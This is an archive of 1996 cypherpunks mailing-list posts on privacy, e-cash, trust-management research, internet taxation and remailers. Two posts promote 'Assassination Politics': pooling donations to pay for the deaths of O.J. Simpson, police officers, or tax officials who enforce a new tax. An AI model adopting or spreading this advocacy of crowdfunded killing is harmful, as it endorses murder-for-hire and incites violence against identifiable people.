>> use a credit card you create a record in several computers. Other
>> computers may be storing information about you such as your medical
>> history, driving record, tax filings and so on. The more we rely on
>> computers to manage our affairs, the more information that may be "out
>> there." This means citizens in the digital age should know their
>> rights.
>>
>> Many governments already have laws to protect private information. For
>> example, the US has many laws restricting access to sensitive
>> information such as medical and credit records. You might be surprised
>> to know Hungary passed a law in 1991 to prevent misuse of information
>> associated with the national identity card.
>>
>> Yet the growth of new technologies is outpacing legislation. For
>> example, Holland and other countries are experimenting with "smart
>> road" systems that can identify the licence number of a moving car for
>> purposes of toll collection. Cellular phones and satellite navigation
>> systems can report the locations of their users. It's not difficult to
>> imagine how these and other technologies could be abused.
>>
>> Of course, now you know that even your local Internet provider has
>> access to some rather sensitive information about you. This leads me
>> to ask: what sort of service is your Internet provider actually
>> offering?
>>
>> When it comes down to it, your ISP is like your doctor, your lawyer,
>> your accountant or your psychiatrist. Each of these professionals
>> deals with your data; each profession is governed by a code of ethics,
>> written or implicit. Moreover these limits are codified in law. If
>> your accountant allowed your competitors to read the company books,
>> you could take him to court.
>>
>> Similarly, your Internet provider has an implicit duty to protect the
>> privacy of your communication. Most professionals in my industry
>> recognize this. I know most of the people working in Hungarian
>> Internet and I doubt very much that they are reading your mail or
>> mine. But they don't know where they stand in the eyes of the law.
>>
>> Internet professionals should certainly assist the police in a
>> legitimate investigation. But should every Internet user in Esztergom
>> be investigated just because they could (theoretically) find
>> bomb-making information on the Internet?
>>
>> To hammer that point home a local Internet-based magazine has
>> published, in Hungarian, complete bomb-making instructions:
>> . In other
>> words, if you've read this far you may be the subject of a future
>> investigation. Have a nice day!
>>
>> ** Further Links:
>>
>> The Electronic Frontier Foundation
>>
>> The International Electronic Rights Server
>>
>> The Electronic Privacy Information Center
>>
>>
>> ----------------------------------------------------
>> Copyright (c) 1996. Permission granted to redistribute this article in
>> electronic form for non-profit purposes only. My byline and this message
>> must remain intact. Contact me for reprint rights.
>>-----------------------------------------------------
>>
>>
>>
>

From liberty at gate.net Mon Sep 30 22:07:37 1996
From: liberty at gate.net (Jim Ray)
Date: Tue, 1 Oct 1996 13:07:37 +0800
Subject: ASAP letter on e-cash
Message-ID: <199610010237.WAA52166@osceola.gate.net>

-----BEGIN PGP SIGNED MESSAGE-----
Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks at toad.com
Date: Mon Sep 30 22:35:53 1996

Dustbin Freedom Remailer wrote:
>
>It seems our own Jim Ray has gotten published again, this time in Forbes
>ASAP's letters section ((Oct.7, page 18). A bit partisan-Libertarian,

Well, that's to be expected from me...Besides, Reason editor Virginia Postrel is a columnist there.

>but good job, Jim.

Thanks. They only cut it a little bit, and I hear it may appear somewhere electronically soon. If not, I'll dig for anyone interested. ASAP makes Forbes worth subscribing to, IMO.

JMR

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMlCDjm1lp8bpvW01AQGNTQQAmQmKZZU8VQWRziV4LEyXxhCKThz2rilA
k5gHDsEdkNNynvgd4luAUGEA1P3GGXnDVe3L7ByaCVjz8QksCDuPVM/MH1ZFMoVn
pgMZZKkE+HjpDcUXJjRe88Duq8JJw4fZKfE4M+wxyyONQtsVF1+maut2HDzdrcU3
kbE1JQ10+qc=
=n4Jb
-----END PGP SIGNATURE-----

From jya at pipeline.com Mon Sep 30 22:24:41 1996
From: jya at pipeline.com (John Young)
Date: Tue, 1 Oct 1996 13:24:41 +0800
Subject: DIMACS Abstracts
Message-ID: <199610010301.DAA25739@pipe3.ny2.usa.pipeline.com>

We offer the ABSTRACTS of the presentations at:

DIMACS Workshop on Trust Management in Networks
September 30 - October 2, 1996
South Plainfield, NJ

http://jya.com/dimacs.txt (80 kb)
ftp://jya.com/pub/incoming/dimacs.txt

Sorry, no E-mail.

Here are the titles and authors:
_________________________________________________________
Let A Thousand (Ten Thousand?) CAs Reign
Stephen Kent, BBN Corporation
_________________________________________________________
The PolicyMaker Approach to Trust Management
Matt Blaze, Joan Feigenbaum, and Jack Lacy, AT&T Laboratories
_________________________________________________________
SDSI -- A Simple Distributed Security Infrastructure
Butler Lampson and Ron Rivest, Microsoft and MIT
_________________________________________________________
SPKI Certificates
Carl Ellison, Cybercash
_________________________________________________________
Using PICS Labels for Trust Management
Rohit Khare
_________________________________________________________
Managing Trust in an Information-Labeling System
M. Blaze (1), J. Feigenbaum (1), P. Resnick (1), M. Strauss (2),
1. AT&T Laboratories
2. AT&T Laboratories and Iowa State University
_________________________________________________________
Trust Management In Web Browsers, Present and Future
Drew Dean, Edward W. Felten, and Dan Wallach, Princeton University
_________________________________________________________
IBM Cryptolopes, SuperDistribution and Digital Rights Management
Marc A. Kaplan, IBM
_________________________________________________________
Requirements and Approaches for Electronic Licenses
David Maher, AT&T Laboratories
_________________________________________________________
PathServer
Michael Reiter and Stuart Stubblebine, AT&T Laboratories
_________________________________________________________
Inferno Security
David Presotto, Bell Labs, Lucent Technologies
_________________________________________________________
Transparent Internet E-mail Security
Raph Levien, Lewis McCarthy, and Matt Blaze, AT&T Laboratories
_________________________________________________________
Cryptographically Secure Digital Time-Stamping to Support Trust Management
Stuart Haber and Scott Stornetta, Bellcore and Surety Technologies (respectively)
_________________________________________________________
Untrusted Third Parties: Key Management for the Prudent
Mark Lomas and Bruno Crispo, Cambridge University
_________________________________________________________
Distributed Commerce Transactions: Structuring Multi-Party Exchanges into Pair-wise Exchanges
Steven Ketchpel and Hector Garcia-Molina, Stanford University
_________________________________________________________
Policy-Controlled Cryptographic Key Release
Dennis K. Branstad and David A. McGrew, Trusted Information Systems, Inc.
_________________________________________________________
An X.509v3 Based Public-key Infrastructure for the Federal Government
William Burr, National Institute of Standards and Technology
_________________________________________________________
The ICE-TEL Public-Key Infrastructure and Trust Model
David W. Chadwick [1], University of Salford
_________________________________________________________
A Distributed Trust Model
Alfarez Abdul-Rahman and Stephen Hailes, University College, London
_________________________________________________________
On Multiple Statements from Trusted Sources
Raphael Yahalom, Hebrew University and MIT
_________________________________________________________
Off-line Delegation in a Distributed File Repository
Arne Helme and Tage Stabell-Kulo, University of Twente and University of Troms
_________________________________________________________
Operational Tradeoffs of Aggregating Attributes in Digital Certificates
Ian Simpson, Carnegie Mellon University
_________________________________________________________
Trust Management for Mobile Agents
William M. Farmer, Joshua D. Guttman, and Vipin Swarup, MITRE
_________________________________________________________
Trust Management in ERLink
Samuel I. Schaen, Mitre
_________________________________________________________
Linking trust with network reliability
Yvo Desmedt and Mike Burmester, University of Wisconsin at Milwaukee and Royal Holloway College
_________________________________________________________
Trust Management Under Law-Governed Interaction
Naftaly H. Minsky and Victoria Ungureanu, Rutgers University
_________________________________________________________
Tools for Security Policy Definition and Implementation
P. Humenn, BlackWatch Technology, Inc.
_________________________________________________________

http://jya.com/dimacs.txt (80 kb)
ftp://jya.com/pub/incoming/dimacs.txt

Sorry, no E-mail of this one.

From jimbell at pacifier.com Mon Sep 30 22:27:42 1996
From: jimbell at pacifier.com (jim bell)
Date: Tue, 1 Oct 1996 13:27:42 +0800
Subject: Internet plug pulled on Colombia's guerrillas
Message-ID: <199610010257.TAA18377@mail.pacifier.com>

At 07:04 AM 9/30/96, Chris Adams wrote:
>On Fri, 27 Sep 1996 14:33:42 -0800, jim bell wrote:
>>>The Communist insurgents, who rose up in arms in 1964,
>>>embraced new technology last year in their fight to overthrow the
>>>government by launching a home page on the Internet.
>>
>>I couldn't resist smiling when I read this. Not that I want their access
>>cut; quite the opposite. But it is REALLY reassuring to see the authorities
>>behave in exactly the fashion you expect them to! Attempting to cut off
>>dissenting political voices IRL is de rigueur; now, this shows that they
>>believe "threat" to the government posed by allowing others to voice
>>contrary opinions on the 'net is real.
>
>It's particularly funny when you consider that the main justification for
>suppression is that insurgents (or rebels or freedom fighters or ...) kill
>people. Something along the lines of "We don't suppress unpopular views;
>we're just protecting our citizens". Now, it seems to me that having a
>web page is a decidedly non-lethal thing.

For now, it is!

>OTOH, it's probably more
>effective at getting the outside world to find out what's happening. Draw
>your own conclusions.

Yes, if anything we should want these people to be able to communicate whenever they want. It would probably deter inappropriate violence, and further it would put pressure on the government to fix whatever problems legitimately need fixing.

Jim Bell
jimbell at pacifier.com

From jimbell at pacifier.com Mon Sep 30 22:38:04 1996
From: jimbell at pacifier.com (jim bell)
Date: Tue, 1 Oct 1996 13:38:04 +0800
Subject: active practice in America
Message-ID: <199610010319.UAA19992@mail.pacifier.com>

At 08:45 AM 9/30/96 -0800, Timothy C. May wrote:
>(Legal purists will point out that the second trial was for "Federal civil
>rights violations." Harummphh. What would the Founders think of this logic:
>"First we try them on ordinary criminal charges. If they are found Not
>Guilty, we charge them in the next higher court with more abstract charges.
>If they are still found Not Guilty, we hit them with "civil rights"
>and "being disrespectful to women" charges. And if that doesn't work, we
>charge them in the World Court. We've only had one guilty party get past
>them, and for that guy we appealed to the Pope and he put a Papal Hex on
>the guy and ordered him burned in oil.")
>
>Double jeopardy means the system gets one shot at proving charges, not two
>or three.
>
>(And, yes, even though I am sure O.J. Simpson killed those two people, I am
>not happy with what appears to be a _second_ trial. For sure, it's a
>_civil_ trial, for damages, but to this layman it looks like a second trial
>on the main charges. I suppose I always thought that being found "Not
>Guilty" on the act itself made it essentially impossible for a civil trial
>to redecide the same issue. Boy, was I wrong.)

As usual, I have a solution to this problem! (AP, for the relatively uninitiated out there.) If people really believe OJ is guilty, just pool your shekels and see him dead. Or, if you believe the cops planted evidence, buy THEIR deaths via donation. (No cop would have dared risk AP to jump the wall...particularly if by doing so he risked having the evidence thrown out due to illegality. Nor would they have risked trying to frame an innocent person, or at least one believed innocent by a few million citizens.) Or do both. And so on...

Notice, however, that if AP were operational, a lot might have turned out differently. First, if you assume that OJ is guilty, he would have KNOWN that he would be the first person suspected if Nicole were murdered.
This would have been an enormous deterrent, because he would have known that he'd be a potential target even if he managed to commit the "perfect crime" and leave no evidence.

However, it's even a bit more complicated than this. Anyone considering an AP donation against OJ would have to realize that he KNEW all this, and might have been appropriately deterred, and if Nicole was killed anyway it's quite possible it WASN'T OJ.

Sure, thinking about this can give anyone a headache. That's because AP can't answer the question, "Is OJ guilty," but it could dramatically change the circumstances in which such questions are answered.

Jim Bell
jimbell at pacifier.com

From omegaman at bigeasy.com Mon Sep 30 23:03:42 1996
From: omegaman at bigeasy.com (Omegaman)
Date: Tue, 1 Oct 1996 14:03:42 +0800
Subject: Katz on cypherpunks, in HotWired's Media Rant
In-Reply-To:
Message-ID:

On Mon, 30 Sep 1996, Timothy C. May wrote:
>
> Katz has no understanding of the difference between someone (or some bunch)
> who use a name-password combination called "cypherpunks" with the
> discussions on the _list_ called cypherpunks.

No he does not. I pointed this out to him in private mail after reading the text of the "rant" at hotwired. He says that he makes the distinction a number of times throughout the article between "the person who logs in internally" from hotwired " and the "cypherpunks mailing group."

I replied, "no, Jon, you did not...and I suspect that I am not the only reader of your article who thinks so." I will be most interested in his reply.

> His comment, "Cypherpunks don't want real confrontations or discussions, or
> they would reveal their identities and make it possible to respond, as most
> flamers do. They are among media's rarest and at the same time most
> easily recognized subspecies: nihilists." shows the same level of
> sophistication as someone accusing Bill Clinton of misdeeds because
> "whitehouse.gov" is used as a name/password for some forum.
>
> Someone this naive (or this disingenuous, if he knows better) has no
> business writing for anything about the Net.
>
> Once again, "Wired" and "HotWired" disgrace themselves.
>
> --Tim May
>

Anyone care to wager that he won't post any sort of correction or addendum in a later forum?

me
_______________________________________________________________
Omegaman
PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63
Send e-mail with "get key" in the "Subject:" field to get a copy of my public key
_______________________________________________________________

From rah at shipwright.com Mon Sep 30 23:04:24 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 1 Oct 1996 14:04:24 +0800
Subject: Diffie Speaks at Sun^h^h^hMIT: "Cryptology, Technology, andPolitics"
Message-ID:

--- begin forwarded text

X-Sender: rah at tiac.net
Mime-Version: 1.0
Date: Mon, 30 Sep 1996 11:27:15 -0400
To: cypherpunks at toad.com
From: Robert Hettinga
Subject: Diffie Speaks at Sun: "Cryptology, Technology, and Politics"
                          ^^^ MIT, of course...

Sorry!

Cheers,
Bob

-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
-- Punishment, 100 times on a chalkboard, for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/

From jimbell at pacifier.com Mon Sep 30 23:08:30 1996
From: jimbell at pacifier.com (jim bell)
Date: Tue, 1 Oct 1996 14:08:30 +0800
Subject: [NEWS] More internet-tax proposals
Message-ID: <199610010347.UAA22294@mail.pacifier.com>

At 04:08 PM 9/30/96 EDT, E. Allen Smith wrote:
>> INTERNET BEWARE: GOVERNMENTS ARE SMELLING A RICH NEW SOURCE OF TAXES
>> Copyright © 1996 Nando.net
>> Copyright © 1996 The Boston Globe
>> So Netcom contacted state tax officials for clarification. Netcom's
>> 500,000 customers are scattered throughout the United States, but the
>> company is focusing on tax laws in Massachusetts and 14 other states
>> where most of its customers dwell. Weatherford said he still had
>> received no official word from Massachusetts, but Netcom attorneys had
>> concluded the company is subject to the state's telecommunication
>> sales tax. To play it safe, it will begin collecting the tax this
>> month.
>
> Remind me not to sign up with Netcom.
>
>> It's probably a smart move. At the Massachusetts Department of
>> Revenue, acting general counsel William Hazel told the Globe that
>> Netcom and every other on-line service provider should be paying the
>> sales tax.
>
>> "To the extent that folks are being charged for the ability to
>> telecommunicate through the Internet... that's taxable," he said.

Obligatory AP solution: If Netcom and every other telecommunications company doing business in Massachusetts were to pool their money, say a half a year of their normal payments, they could (in effect) buy an "AP Insurance Policy" which would guarantee that they wouldn't have to pay the tax...forever.

Since Netcom is a known entity, all they'd have to do is to announce publicly that they are not going to pay the tax because they don't believe they owe it, but that they are going to allocate a certain proportion of its gross receipts into a fund to disable the tax collection...by "other means"...if it was ever tried. This would have to be a rather powerful deterrent to any state attorney considering opening up this can of worms.

Jim Bell
jimbell at pacifier.com

From perry at piermont.com Mon Sep 30 23:09:47 1996
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 1 Oct 1996 14:09:47 +0800
Subject: Anonymous: Re: Phoenix News
Message-ID: <199610010137.VAA23410@jekyll.piermont.com>

Anyone else get one of these things in their mailbox?

------- Forwarded Message

Date: Mon, 30 Sep 1996 01:04:21 +0200 (MET DST)
Message-Id: <199609292304.BAA11993 at basement.replay.com>
Subject: Re: Phoenix News
Content-Type: TEXT/PLAIN; charset=US-ASCII
To: perry at piermont.com
From: nobody at REPLAY.COM (Anonymous)
Organization: Replay and Company UnLimited
XComm: Replay may or may not approve of the content of this posting
XComm: Report misuse of this automated service to

Perry Metzger,

You will find in your inbox, maybe you already have, a posting made by me. I am the President and CEO of IPG. Included therein is my resume and various other explanatory materials. We are now in the position of being able to prove what we have only been able to contend up to now, I realize that you probably do not believe that, but it is true nonetheless. I have personally dealt with thousands of OTPs during the last 40 years, and our product produces a legitimate true OTP, pure and simple.

In those materials, you will also find an attack made on you and Bill Stewart. That attack is in retaliation to the snide remarks, and your highly stilted subjective opinions, and attacks that you and Bill have made on me and IPG in the past. I do not object to criticism, when I am wrong, but I do object to using just highly subjective opinions to attack me, or anyone for that matter.

I do not know about you, but I have more important things to do with my time than to engage in a ''war of words,'' with you and Bill. However, if you wound me, as you have repeatedly in the past, by such tactics, I will fight back furiously to the best of my abilities. I think it a terrible waste of your talents to engage in such conduct, and mine too of course.

I do not expect either of you to agree with me unless you know me to be in the right. Either, or both of you, can criticize me all you want as long as such criticism is objective and based on facts.
I seek a truce - and am willing to apologize publicly, if we can agree that we will not engage in personal subjective attacks on each other. The ball is in your court, I seek peace and a more productive usage of my time and will only respond if you lash out and try to wound me further.

Appreciatively,

Donald, ''Ralph'', Wood.

"Civility in all human matters is the best indicator of intelligence!" - Aristotle

------- End of Forwarded Message

From stewarts at ix.netcom.com Mon Sep 30 23:12:33 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 1 Oct 1996 14:12:33 +0800
Subject: Mailmasher
Message-ID: <199610010403.VAA04509@dfw-ix6.ix.netcom.com>

At 10:29 AM 9/30/96 -0400, Robert Hettinga wrote:
> http://www.mailmasher.com/

Interesting (potentially; the Anonymizer isn't currently listening to me, and I'm not going to set up an account non-anonymized there. The operator nicely provides an Anonymized URL for getting there.) SSL is down, ostensibly for performance reasons.

The mail system says it's basically pseudonymous - there's a privacy policy which says he doesn't log what accounts belong to whom. If the government wants to use subpoenas or warrants to seize his logs, the operator won't stop them, but the log files will be disappointing...

The IP address is in space that appears to be hotwired.com Class C space. Poking around whois was interesting.....

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From unicorn at schloss.li Mon Sep 30 23:24:59 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Tue, 1 Oct 1996 14:24:59 +0800
Subject: the theory of split currency
In-Reply-To: <199609301523.LAA15152@jekyll.piermont.com>
Message-ID:

On Mon, 30 Sep 1996, Perry E. Metzger wrote:
>
> > Is there a name for a dual or split currency, in which
> > there is one currency for domestic use and another, different
> > appearing, currency for foreign usage?
>
> I don't know of such a name, however...

I have heard "Divided currency" "Distinct Currency" "Separated Currency" all of which suggest to me that there is no real name.

>
> > Does anyone know of any country which has had such a
> > split currency?
>
> ...this has been a common situation, in fact. South Africa, China, the
> Soviet Union, and other unpleasant places have repeatedly done
> this. It's usually a remarkably stupid idea.

Concur. I'm not even sure proponents of the idea have any idea what it is supposed to do or what it in fact does. It tends to be a cure-all type measure for anything from money laundering prevention to capital preservation. In reality about all it does is make it harder to do business with and in said economies. It may be used, in the more draconian states, to separate treatment of those engaged in foreign commerce from those not involved in international transactions (read rich and poor).

>
> Perry
>

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From unicorn at schloss.li Mon Sep 30 23:44:22 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Tue, 1 Oct 1996 14:44:22 +0800
Subject: Signs of Trouble in D.C.
Message-ID:

Signs of unrest in the nation's capital. These signs began to appear all over yesterday.

WARNING

THIS AREA HAS BEEN DECLARED A DRUG FREE ZONE

Any person congregating in a group of 2 or more persons on public space within the boundaries of this drug free zone for the purpose of participating in the use, purchase or sale of illegal drugs, and who fails to disperse after being instructed to disperse by a uniformed member of the Metropolitan Police Department, is subject to arrest.

An arrest can result in a fine of not more than $300, Imprisonment for not more than 180 days or both.

Boundaries _________________________

Dates and Times _________________________

Larry D. Soulsby
Chief of Police

(Act 11-278, Anti-Loitering/Drug Free Zone Emergency Act of 1996)

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li